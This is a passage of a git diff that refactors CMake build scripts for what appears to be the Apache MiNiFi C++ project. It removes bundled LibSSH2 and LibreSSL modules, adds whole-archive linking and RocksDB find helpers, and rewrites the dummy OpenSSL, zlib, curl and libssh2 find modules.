-# 
-# Unless required by applicable law or agreed to in writing,
-# software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
-# KIND, either express or implied.  See the License for the
-# specific language governing permissions and limitations
-# under the License.
-
-#  ROCKSDB_FOUND               System has RocksDB library/headers.
-#  ROCKSDB_LIBRARIES           The RocksDB library.
-#  ROCKSDB_INCLUDE_DIR        The location of RocksDB headers.
-
-find_path(ROCKSDB_ROOT_DIR
-    NAMES include/rocksdb/db.h
-)
-
-find_library(ROCKSDB_LIBRARIES
-    NAMES rocksdb
-    HINTS ${ROCKSDB_ROOT_DIR}/lib
-)
-
-find_path(ROCKSDB_INCLUDE_DIR
-    NAMES rocksdb/db.h
-    HINTS ${ROCKSDB_ROOT_DIR}/include
-)
-
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(RocksDB DEFAULT_MSG
-    ROCKSDB_LIBRARIES
-    ROCKSDB_INCLUDE_DIR
-)
-
-mark_as_advanced(
-    ROCKSDB_ROOT_DIR
-    ROCKSDB_LIBRARIES
-    ROCKSDB_INCLUDE_DIR
-)
-
-if(ROCKSDB_INCLUDE_DIR AND ROCKSDB_LIBRARIES)
-  set(ROCKSDB_FOUND "YES")
-  message(STATUS "Found RocksDB...${ROCKSDB_LIBRARIES}")
-endif()
\ No newline at end of file
diff --git a/cmake/LibSSH2.cmake b/cmake/LibSSH2.cmake
deleted file mode 100644
index fc04707..0000000
--- a/cmake/LibSSH2.cmake
+++ /dev/null
@@ -1,94 +0,0 @@
-# Licensed to the Apache Software Foundation (ASF) under one
-# or more contributor license agreements.  See the NOTICE file
-# distributed with this work for additional information
-# regarding copyright ownership.  The ASF licenses this file
-# to you under the Apache License, Version 2.0 (the
-# "License"); you may not use this file except in compliance
-# with the License.  You may obtain a copy of the License at
-#
-#   http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing,
-# software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
-# KIND, either express or implied.  See the License for the
-# specific language governing permissions and limitations
-# under the License.
-
-function(use_bundled_libssh2 SOURCE_DIR BINARY_DIR)
-    message("Using bundled libssh2")
-
-    if (WIN32)
-        set(BYPRODUCT "lib/libssh2.lib")
-    else()
-        set(BYPRODUCT "lib/libssh2.a")
-    endif()
-
-    if (WIN32)
-        string(REPLACE "/" "\\" CMAKE_CURRENT_SOURCE_DIR_BACKSLASH ${CMAKE_CURRENT_SOURCE_DIR})
-        set(PC copy /Y ${CMAKE_CURRENT_SOURCE_DIR_BACKSLASH}\\thirdparty\\libssh2\\CMakeLists.txt CMakeLists.txt)
-    else()
-        set(PC patch -p1 < ${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/libssh2/libssh2-CMAKE_MODULE_PATH.patch)
-    endif()
-
-    set(LIBSSH2_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-            "-DCMAKE_INSTALL_PREFIX=${CMAKE_CURRENT_BINARY_DIR}/thirdparty/libssh2-install"
-            -DENABLE_ZLIB_COMPRESSION=ON
-            -DCRYPTO_BACKEND=OpenSSL
-            -DBUILD_TESTING=OFF
-            -DBUILD_EXAMPLES=OFF)
-
-    list(APPEND CMAKE_MODULE_PATH_PASSTHROUGH_LIST ${CMAKE_CURRENT_SOURCE_DIR}/cmake/ssl)
-    list(APPEND LIBSSH2_CMAKE_ARGS "-DLIBRESSL_BIN_DIR=${LIBRESSL_BIN_DIR}"
-            "-DLIBRESSL_SRC_DIR=${LIBRESSL_SRC_DIR}"
-            "-DBYPRODUCT_PREFIX=${BYPRODUCT_PREFIX}"
-            "-DBYPRODUCT_SUFFIX=${BYPRODUCT_SUFFIX}")
-    if(NOT USE_SYSTEM_ZLIB OR USE_SYSTEM_ZLIB STREQUAL "OFF")
-        list(APPEND CMAKE_MODULE_PATH_PASSTHROUGH_LIST ${CMAKE_CURRENT_SOURCE_DIR}/cmake/zlib/dummy)
-        list(APPEND LIBSSH2_CMAKE_ARGS "-DZLIB_BYPRODUCT_INCLUDE=${ZLIB_BYPRODUCT_INCLUDE}"
-                "-DZLIB_BYPRODUCT=${ZLIB_BYPRODUCT}")
-    endif()
-    if(CMAKE_MODULE_PATH_PASSTHROUGH_LIST)
-        string(REPLACE ";" "%" CMAKE_MODULE_PATH_PASSTHROUGH "${CMAKE_MODULE_PATH_PASSTHROUGH_LIST}")
-        list(APPEND LIBSSH2_CMAKE_ARGS "-DCMAKE_MODULE_PATH=${CMAKE_MODULE_PATH_PASSTHROUGH}")
-    endif()
-
-    ExternalProject_Add(
-            libssh2-external
-            URL "https://www.libssh2.org/download/libssh2-1.8.2.tar.gz"
-            URL_HASH "SHA256=088307d9f6b6c4b8c13f34602e8ff65d21c2dc4d55284dfe15d502c4ee190d67"
-            SOURCE_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/libssh2-src"
-            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
-            CMAKE_ARGS ${LIBSSH2_CMAKE_ARGS}
-            PATCH_COMMAND ${PC}
-            BUILD_BYPRODUCTS "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/libssh2-install/${BYPRODUCT}"
-    )
-
-    add_dependencies(libssh2-external libressl-portable)
-    if(NOT USE_SYSTEM_ZLIB OR USE_SYSTEM_ZLIB STREQUAL "OFF")
-        add_dependencies(libssh2-external z)
-    endif()
-
-    set(LIBSSH2_SRC_DIR "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/libssh2/" CACHE STRING "" FORCE)
-    set(LIBSSH2_BIN_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/libssh2-install/" CACHE STRING "" FORCE)
-    set(LIBSSH2_BYPRODUCT_DIR "${BYPRODUCT}" CACHE STRING "" FORCE)
-
-    add_library(libssh2 STATIC IMPORTED)
-    set_target_properties(libssh2 PROPERTIES IMPORTED_LOCATION "${LIBSSH2_BIN_DIR}${BYPRODUCT}")
-
-    if (OPENSSL_FOUND)
-        if (NOT WIN32)
-            set_target_properties(libssh2 PROPERTIES INTERFACE_LINK_LIBRARIES "${OPENSSL_LIBRARIES}")
-        endif()
-    endif(OPENSSL_FOUND)
-    if (ZLIB_FOUND)
-        if (NOT WIN32)
-            set_target_properties(libssh2 PROPERTIES INTERFACE_LINK_LIBRARIES "${ZLIB_LIBRARIES}")
-        endif()
-    endif(ZLIB_FOUND)
-    add_dependencies(libssh2 libssh2-external)
-    set(LIBSSH2_FOUND "YES" CACHE STRING "" FORCE)
-    set(LIBSSH2_INCLUDE_DIR "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/libssh2/include" CACHE STRING "" FORCE)
-    set(LIBSSH2_LIBRARY "${LIBSSH2_BIN_DIR}${BYPRODUCT}" CACHE STRING "" FORCE)
-    set(LIBSSH2_LIBRARIES ${LIBSSH2_LIBRARY} CACHE STRING "" FORCE)
-endfunction(use_libre_ssl)
\ No newline at end of file
diff --git a/cmake/LibreSSL.cmake b/cmake/LibreSSL.cmake
deleted file mode 100644
index b208e5f..0000000
--- a/cmake/LibreSSL.cmake
+++ /dev/null
@@ -1,63 +0,0 @@
-# Licensed to the Apache Software Foundation (ASF) under one
-# or more contributor license agreements.  See the NOTICE file
-# distributed with this work for additional information
-# regarding copyright ownership.  The ASF licenses this file
-# to you under the Apache License, Version 2.0 (the
-# "License"); you may not use this file except in compliance
-# with the License.  You may obtain a copy of the License at
-#
-#   http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing,
-# software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
-# KIND, either express or implied.  See the License for the
-# specific language governing permissions and limitations
-# under the License.
-
-function(use_libre_ssl SOURCE_DIR BINARY_DIR)
-	message("Using bundled LibreSSL from release")
-	
-	set(BYPRODUCT_PREFIX "lib" CACHE STRING "" FORCE)
-	set(BYPRODUCT_SUFFIX ".a" CACHE STRING "" FORCE)
-	
-	set(BUILD_ARGS "")
-	if (WIN32)
-		set(BYPRODUCT_SUFFIX ".lib" CACHE STRING "" FORCE)
-		set(BYPRODUCT_PREFIX "" CACHE STRING "" FORCE)
-	set(BUILD_ARGS " -GVisual Studio 15 2017")
-	endif(WIN32)
-	ExternalProject_Add(
-	libressl-portable
-	URL https://cdn.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.3.tar.gz https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-2.8.3.tar.gz https://gentoo.osuosl.org/distfiles/libressl-2.8.3.tar.gz
-	URL_HASH "SHA256=9b640b13047182761a99ce3e4f000be9687566e0828b4a72709e9e6a3ef98477"
-	SOURCE_DIR "${BINARY_DIR}/thirdparty/libressl-src"
-	CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-				"-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libressl-install"
-				"-DLIBRESSL_APPS=OFF"
-				"-DLIBRESSL_TESTS=OFF"
-				"${BUILD_ARGS}"
-	)
-
-	add_library(crypto STATIC IMPORTED)
-	set_target_properties(crypto PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}")
-	add_dependencies(crypto libressl-portable)
-					
-	add_library(ssl STATIC IMPORTED)
-	set_target_properties(ssl PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}")
-	set_target_properties(ssl PROPERTIES INTERFACE_LINK_LIBRARIES crypto)
-	add_dependencies(ssl libressl-portable)
-	
-	add_library(tls STATIC IMPORTED)
-	set_target_properties(tls PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}tls${BYPRODUCT_SUFFIX}")
-	set_target_properties(tls PROPERTIES INTERFACE_LINK_LIBRARIES crypto)
-	add_dependencies(tls libressl-portable)
-	
-	set(LIBRESSL_SRC_DIR "${SOURCE_DIR}/thirdparty/libressl/" CACHE STRING "" FORCE)
-	set(LIBRESSL_BIN_DIR "${BINARY_DIR}/thirdparty/libressl-install/" CACHE STRING "" FORCE)
-
-	set(OPENSSL_FOUND "YES" CACHE STRING "" FORCE)
-	set(OPENSSL_INCLUDE_DIR "${SOURCE_DIR}/thirdparty/libressl/include" CACHE STRING "" FORCE)
-	set(OPENSSL_LIBRARIES "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}tls${BYPRODUCT_SUFFIX}" "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}" "${BINARY_DIR}/thirdparty/libressl-install/lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
-	
-endfunction(use_libre_ssl) 
diff --git a/cmake/WholeArchive.cmake b/cmake/WholeArchive.cmake
new file mode 100644
index 0000000..60db5f6
--- /dev/null
+++ b/cmake/WholeArchive.cmake
@@ -0,0 +1,31 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(target_wholearchive_library TARGET ITEM)
+    if (APPLE)
+        target_link_libraries(${TARGET} ${ITEM})
+        target_link_libraries(${TARGET} -Wl,-force_load,$<TARGET_FILE:${ITEM}>)
+        add_dependencies(${TARGET} ${ITEM})
+    elseif(WIN32)
+        target_link_libraries(${TARGET} ${ITEM})
+        set_property(TARGET ${TARGET} APPEND PROPERTY LINK_OPTIONS "/WHOLEARCHIVE:${ITEM}")
+        add_dependencies(${TARGET} ${ITEM})
+    else()
+        target_link_libraries(${TARGET} -Wl,--whole-archive ${ITEM} -Wl,--no-whole-archive)
+        add_dependencies(${TARGET} ${ITEM})
+    endif()
+endfunction(target_wholearchive_library)
diff --git a/cmake/civetweb/dummy/FindCivetWeb.cmake b/cmake/civetweb/dummy/FindCivetWeb.cmake
new file mode 100644
index 0000000..420db11
--- /dev/null
+++ b/cmake/civetweb/dummy/FindCivetWeb.cmake
@@ -0,0 +1,22 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+if (NOT CIVETWEB_FOUND)
+    set(CIVETWEB_FOUND "YES" CACHE STRING "" FORCE)
+    set(CIVETWEB_INCLUDE_DIR "${EXPORT_CIVETWEB_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(CIVETWEB_LIBRARIES "${EXPORT_CIVETWEB_LIBRARIES}" CACHE STRING "" FORCE)
+endif()
diff --git a/cmake/curl/dummy/FindCURL.cmake b/cmake/curl/dummy/FindCURL.cmake
index d179cb2..72802bb 100644
--- a/cmake/curl/dummy/FindCURL.cmake
+++ b/cmake/curl/dummy/FindCURL.cmake
@@ -14,7 +14,11 @@
 # KIND, either express or implied.  See the License for the
 # specific language governing permissions and limitations
 # under the License.
-set(CURL_FOUND "YES" CACHE STRING "" FORCE)
-set(CURL_INCLUDE_DIR "${CURL_SRC_DIR}/include" CACHE STRING "" FORCE)
-set(CURL_LIBRARY "${CURL_BIN_DIR}${CURL_BYPRODUCT_DIR}" CACHE STRING "" FORCE)
-set(CURL_LIBRARIES "${CURL_BIN_DIR}${CURL_BYPRODUCT_DIR}" CACHE STRING "" FORCE)
+
+if(NOT CURL_FOUND)
+    set(CURL_FOUND "YES" CACHE STRING "" FORCE)
+    set(CURL_INCLUDE_DIR "${EXPORTED_CURL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(CURL_INCLUDE_DIRS "${CURL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(CURL_LIBRARY "${EXPORTED_CURL_LIBRARY}" CACHE STRING "" FORCE)
+    set(CURL_LIBRARIES "${CURL_LIBRARY}" CACHE STRING "" FORCE)
+endif()
diff --git a/cmake/libssh2/dummy/FindLibSSH2.cmake b/cmake/libssh2/dummy/FindLibSSH2.cmake
index 64a7f23..9366abe 100644
--- a/cmake/libssh2/dummy/FindLibSSH2.cmake
+++ b/cmake/libssh2/dummy/FindLibSSH2.cmake
@@ -15,9 +15,9 @@
 # specific language governing permissions and limitations
 # under the License.
 
-set(LIBSSH2_FOUND "YES" CACHE STRING "" FORCE)
-set(LIBSSH2_INCLUDE_DIR "${LIBSSH2_SRC_DIR}/include" CACHE STRING "" FORCE)
-set(LIBSSH2_LIBRARY "${LIBSSH2_BIN_DIR}${LIBSSH2_BYPRODUCT_DIR}" CACHE STRING "" FORCE)
-set(LIBSSH2_LIBRARIES "${LIBSSH2_BIN_DIR}${LIBSSH2_BYPRODUCT_DIR}" CACHE STRING "" FORCE)
-
-message("LibSSH2 LIB is located at is ${LIBSSH2_LIBRARIES}")
\ No newline at end of file
+if(NOT LIBSSH2_FOUND)
+    set(LIBSSH2_FOUND "YES" CACHE STRING "" FORCE)
+    set(LIBSSH2_INCLUDE_DIR "${EXPORTED_LIBSSH2_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(LIBSSH2_LIBRARY "${EXPORTED_LIBSSH2_LIBRARY}" CACHE STRING "" FORCE)
+    set(LIBSSH2_LIBRARIES "${LIBSSH2_LIBRARY}" CACHE STRING "" FORCE)
+endif()
diff --git a/cmake/rocksdb/sys/FindRocksDB.cmake b/cmake/rocksdb/sys/FindRocksDB.cmake
new file mode 100644
index 0000000..657918a
--- /dev/null
+++ b/cmake/rocksdb/sys/FindRocksDB.cmake
@@ -0,0 +1,60 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+# 
+#   http://www.apache.org/licenses/LICENSE-2.0
+# 
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+#  ROCKSDB_FOUND               System has RocksDB library/headers.
+#  ROCKSDB_LIBRARIES           The RocksDB library.
+#  ROCKSDB_INCLUDE_DIR        The location of RocksDB headers.
+
+find_path(ROCKSDB_ROOT_DIR
+    NAMES include/rocksdb/db.h
+)
+
+find_library(ROCKSDB_LIBRARIES
+    NAMES rocksdb
+    HINTS ${ROCKSDB_ROOT_DIR}/lib
+)
+
+find_path(ROCKSDB_INCLUDE_DIR
+    NAMES rocksdb/db.h
+    HINTS ${ROCKSDB_ROOT_DIR}/include
+)
+
+include(FindPackageHandleStandardArgs)
+find_package_handle_standard_args(RocksDB DEFAULT_MSG
+    ROCKSDB_LIBRARIES
+    ROCKSDB_INCLUDE_DIR
+)
+
+mark_as_advanced(
+    ROCKSDB_ROOT_DIR
+    ROCKSDB_LIBRARIES
+    ROCKSDB_INCLUDE_DIR
+)
+
+if(ROCKSDB_INCLUDE_DIR AND ROCKSDB_LIBRARIES)
+  set(ROCKSDB_FOUND "YES")
+  message(STATUS "Found RocksDB...${ROCKSDB_LIBRARIES}")
+endif()
+
+if(NOT TARGET RocksDB::RocksDB)
+  add_library(RocksDB::RocksDB UNKNOWN IMPORTED)
+  set_target_properties(RocksDB::RocksDB PROPERTIES
+          INTERFACE_INCLUDE_DIRECTORIES "${ROCKSDB_INCLUDE_DIR}")
+  set_target_properties(RocksDB::RocksDB PROPERTIES
+          IMPORTED_LINK_INTERFACE_LANGUAGES "CXX"
+          IMPORTED_LOCATION "${ROCKSDB_LIBRARIES}")
+endif()
diff --git a/cmake/ssl/FindOpenSSL.cmake b/cmake/ssl/FindOpenSSL.cmake
index 0ecdf2e..087b1ce 100644
--- a/cmake/ssl/FindOpenSSL.cmake
+++ b/cmake/ssl/FindOpenSSL.cmake
@@ -17,31 +17,29 @@
 
 # Dummy OpenSSL find for when we use bundled version
 
-set(OPENSSL_FOUND "YES" CACHE STRING "" FORCE)
-set(OPENSSL_INCLUDE_DIR "${LIBRESSL_SRC_DIR}/include" CACHE STRING "" FORCE)
-set(OPENSSL_CRYPTO_LIBRARY "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}crypto${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
-set(OPENSSL_SSL_LIBRARY "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}ssl${BYPRODUCT_SUFFIX}" CACHE STRING "" FORCE)
-set(OPENSSL_LIBRARIES "${LIBRESSL_BIN_DIR}/lib/${BYPRODUCT_PREFIX}tls${BYPRODUCT_SUFFIX}" ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY} CACHE STRING "" FORCE)
-set(OPENSSL_VERSION "1.0.2" CACHE STRING "" FORCE)
+if(NOT OPENSSL_FOUND)
+  set(OPENSSL_FOUND "YES" CACHE STRING "" FORCE)
+  set(OPENSSL_INCLUDE_DIR "${EXPORTED_OPENSSL_INCLUDE_DIR}" CACHE STRING "" FORCE)
+  set(OPENSSL_CRYPTO_LIBRARY "${EXPORTED_OPENSSL_CRYPTO_LIBRARY}" CACHE STRING "" FORCE)
+  set(OPENSSL_SSL_LIBRARY "${EXPORTED_OPENSSL_SSL_LIBRARY}" CACHE STRING "" FORCE)
+  set(OPENSSL_LIBRARIES ${EXPORTED_OPENSSL_LIBRARIES} CACHE STRING "" FORCE)
+  set(OPENSSL_VERSION "1.0.2" CACHE STRING "" FORCE)
+endif()
 
- if(NOT TARGET OpenSSL::Crypto )
-    add_library(OpenSSL::Crypto UNKNOWN IMPORTED)
-    set_target_properties(OpenSSL::Crypto PROPERTIES
-      INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
-    
-      set_target_properties(OpenSSL::Crypto PROPERTIES
-        IMPORTED_LINK_INTERFACE_LANGUAGES "C"
-        IMPORTED_LOCATION "${OPENSSL_CRYPTO_LIBRARY}")
-    
-  endif()
+if(NOT TARGET OpenSSL::Crypto)
+  add_library(OpenSSL::Crypto UNKNOWN IMPORTED)
+  set_target_properties(OpenSSL::Crypto PROPERTIES
+          INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
+  set_target_properties(OpenSSL::Crypto PROPERTIES
+          IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+          IMPORTED_LOCATION "${OPENSSL_CRYPTO_LIBRARY}")
+endif()
 
-  if(NOT TARGET OpenSSL::SSL
-      )
-    add_library(OpenSSL::SSL UNKNOWN IMPORTED)
-    set_target_properties(OpenSSL::SSL PROPERTIES
-      INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
-          set_target_properties(OpenSSL::SSL PROPERTIES
-        IMPORTED_LINK_INTERFACE_LANGUAGES "C"
-        IMPORTED_LOCATION "${OPENSSL_SSL_LIBRARY}")
-    
-  endif()
+if(NOT TARGET OpenSSL::SSL)
+  add_library(OpenSSL::SSL UNKNOWN IMPORTED)
+  set_target_properties(OpenSSL::SSL PROPERTIES
+          INTERFACE_INCLUDE_DIRECTORIES "${OPENSSL_INCLUDE_DIR}")
+  set_target_properties(OpenSSL::SSL PROPERTIES
+          IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+          IMPORTED_LOCATION "${OPENSSL_SSL_LIBRARY}")
+endif()
diff --git a/cmake/winssl/FindOpenSSL.cmake b/cmake/winssl/FindOpenSSL.cmake
deleted file mode 100644
index 1830efa..0000000
--- a/cmake/winssl/FindOpenSSL.cmake
+++ /dev/null
@@ -1,18 +0,0 @@
-# Licensed to the Apache Software Foundation (ASF) under one
-# or more contributor license agreements.  See the NOTICE file
-# distributed with this work for additional information
-# regarding copyright ownership.  The ASF licenses this file
-# to you under the Apache License, Version 2.0 (the
-# "License"); you may not use this file except in compliance
-# with the License.  You may obtain a copy of the License at
-# 
-#   http://www.apache.org/licenses/LICENSE-2.0
-# 
-# Unless required by applicable law or agreed to in writing,
-# software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
-# KIND, either express or implied.  See the License for the
-# specific language governing permissions and limitations
-# under the License.
-
-# Dummy OpenSSL find for when we use bundled version
\ No newline at end of file
diff --git a/cmake/zlib/dummy/FindZLIB.cmake b/cmake/zlib/dummy/FindZLIB.cmake
index 038dacd..f9a242f 100644
--- a/cmake/zlib/dummy/FindZLIB.cmake
+++ b/cmake/zlib/dummy/FindZLIB.cmake
@@ -16,24 +16,21 @@
 # under the License.
 
 # Dummy zlib find for when we use bundled version
+if(NOT ZLIB_FOUND)
   set(ZLIB_FOUND "YES" CACHE STRING "" FORCE)
-    
-  set(ZLIB_INCLUDE_DIR "${ZLIB_BYPRODUCT_INCLUDE}" CACHE STRING "" FORCE)
-  set(ZLIB_INCLUDE_DIRS "${ZLIB_BYPRODUCT_INCLUDE}" CACHE STRING "" FORCE)
-  
-  set(ZLIB_LIBRARY "${ZLIB_BYPRODUCT}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARIES "${ZLIB_LIBRARY}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARY_RELEASE "${ZLIB_LIBRARY}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARY_DEBUG "${ZLIB_LIBRARY}" CACHE STRING "" FORCE)
-  message("ZLIB LIB is located at is ${ZLIB_LIBRARIES}")
-  
-  if(NOT TARGET ZLIB::ZLIB
-      )
-    add_library(ZLIB::ZLIB UNKNOWN IMPORTED)
-    set_target_properties(ZLIB::ZLIB PROPERTIES
-      INTERFACE_INCLUDE_DIRECTORIES "${ZLIB_INCLUDE_DIR}")
-          set_target_properties(ZLIB::ZLIB PROPERTIES
-        IMPORTED_LINK_INTERFACE_LANGUAGES "C"
-        IMPORTED_LOCATION "${ZLIB_LIBRARY}")
-    
-  endif()
\ No newline at end of file
+  set(ZLIB_INCLUDE_DIRS "${EXPORTED_ZLIB_INCLUDE_DIRS}" CACHE STRING "" FORCE)
+  set(ZLIB_LIBRARIES "${EXPORTED_ZLIB_LIBRARIES}" CACHE STRING "" FORCE)
+  set(ZLIB_VERSION_STRING "${EXPORTED_ZLIB_VERSION_STRING}" CACHE STRING "" FORCE)
+  set(ZLIB_VERSION_MAJOR "${EXPORTED_ZLIB_VERSION_MAJOR}" CACHE STRING "" FORCE)
+  set(ZLIB_VERSION_MINOR "${EXPORTED_ZLIB_VERSION_MINOR}" CACHE STRING "" FORCE)
+  set(ZLIB_VERSION_PATCH "${EXPORTED_ZLIB_VERSION_PATCH}" CACHE STRING "" FORCE)
+endif()
+
+if(NOT TARGET ZLIB::ZLIB)
+  add_library(ZLIB::ZLIB STATIC IMPORTED)
+  set_target_properties(ZLIB::ZLIB PROPERTIES
+          INTERFACE_INCLUDE_DIRECTORIES "${ZLIB_INCLUDE_DIRS}")
+  set_target_properties(ZLIB::ZLIB PROPERTIES
+          IMPORTED_LINK_INTERFACE_LANGUAGES "C"
+          IMPORTED_LOCATION "${ZLIB_LIBRARIES}")
+endif()
diff --git a/controller/CMakeLists.txt b/controller/CMakeLists.txt
index 9ab9cfb..3e35b76 100644
--- a/controller/CMakeLists.txt
+++ b/controller/CMakeLists.txt
@@ -25,7 +25,7 @@
 
 
 
-include_directories(../main/ ../libminifi/include  ../libminifi/include/c2  ../libminifi/include/c2/protocols/  ../libminifi/include/core/state ./libminifi/include/core/statemanagement/metrics  ../libminifi/include/core/yaml  ../libminifi/include/core  ../thirdparty/cron ../thirdparty/spdlog-20170710/include ../thirdparty/concurrentqueue ../thirdparty/yaml-cpp-yaml-cpp-20171024/include ${CIVET_THIRDPARTY_ROOT}/include ../thirdparty/cxxopts/include  ../thirdparty/)
+include_directories(../main/ ../libminifi/include  ../libminifi/include/c2  ../libminifi/include/c2/protocols/  ../libminifi/include/core/state ./libminifi/include/core/statemanagement/metrics  ../libminifi/include/core/yaml  ../libminifi/include/core)
 
 
 if(WIN32)
@@ -54,49 +54,16 @@
   target_link_libraries(minificontroller "${CMAKE_THREAD_LIBS_INIT}")
 endif()
 
-# Include OpenSSL
-find_package(OpenSSL)
-if (OPENSSL_FOUND)
-include_directories(${OPENSSL_INCLUDE_DIR})
-endif(OPENSSL_FOUND)
+target_wholearchive_library(minificontroller minifi)
 
-# Link against minifi, yaml-cpp, civetweb-cpp, uuid, openssl, jsoncpp and rocksdb
-target_link_libraries(minificontroller minifi ${DL})
+target_link_libraries(minificontroller cxxopts)
 
+get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
+foreach(EXTENSION ${extensions})
+	target_wholearchive_library(minificontroller ${EXTENSION})
+endforeach()
 
-add_dependencies(minificontroller minifi)
-
-if (APPLE)
-	target_link_libraries (minificontroller -Wl,-all_load minifi)
-else ()
-	target_link_libraries (minificontroller -Wl,--whole-archive minifi -Wl,--no-whole-archive)
-endif ()
-
-if (WIN32)
-	include_directories("../thirdparty/Simple-Windows-Posix-Semaphore")
-  	target_link_libraries(minificontroller semaphore)
-endif()
-
-target_link_libraries(minificontroller yaml-cpp c-library civetweb-cpp ${JSON_CPP_LIB} cxxopts)
-
-
-if (APPLE)
-	get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
-	foreach(EXTENSION ${extensions})
-		message("Linking against ${EXTENSION}")
-		add_dependencies(minificontroller ${EXTENSION})
-		target_link_libraries (minificontroller -Wl,-all_load ${EXTENSION})
-	endforeach()    
-else ()
-	get_property(extensions GLOBAL PROPERTY EXTENSION-OPTIONS)
-	foreach(EXTENSION ${extensions})
-	add_dependencies(minificontroller ${EXTENSION})
-	  target_link_libraries (minificontroller -Wl,--whole-archive ${EXTENSION} -Wl,--no-whole-archive)
-	endforeach()
-endif ()
-
-set_target_properties(minificontroller
-        PROPERTIES OUTPUT_NAME minificontroller)
+set_target_properties(minificontroller PROPERTIES OUTPUT_NAME minificontroller)
 
 install(TARGETS minificontroller
         RUNTIME
diff --git a/controller/MiNiFiController.cpp b/controller/MiNiFiController.cpp
index c696e38..c87dbfa 100644
--- a/controller/MiNiFiController.cpp
+++ b/controller/MiNiFiController.cpp
@@ -22,7 +22,6 @@
 #include <vector>
 #include <queue>
 #include <map>
-#include <yaml-cpp/yaml.h>
 #include <iostream>
 #include "io/BaseStream.h"
 
diff --git a/extensions/ExtensionHeader.txt b/extensions/ExtensionHeader.txt
index 311e561..426a3e0 100644
--- a/extensions/ExtensionHeader.txt
+++ b/extensions/ExtensionHeader.txt
@@ -20,7 +20,7 @@
 cmake_minimum_required(VERSION 2.6)
 
 
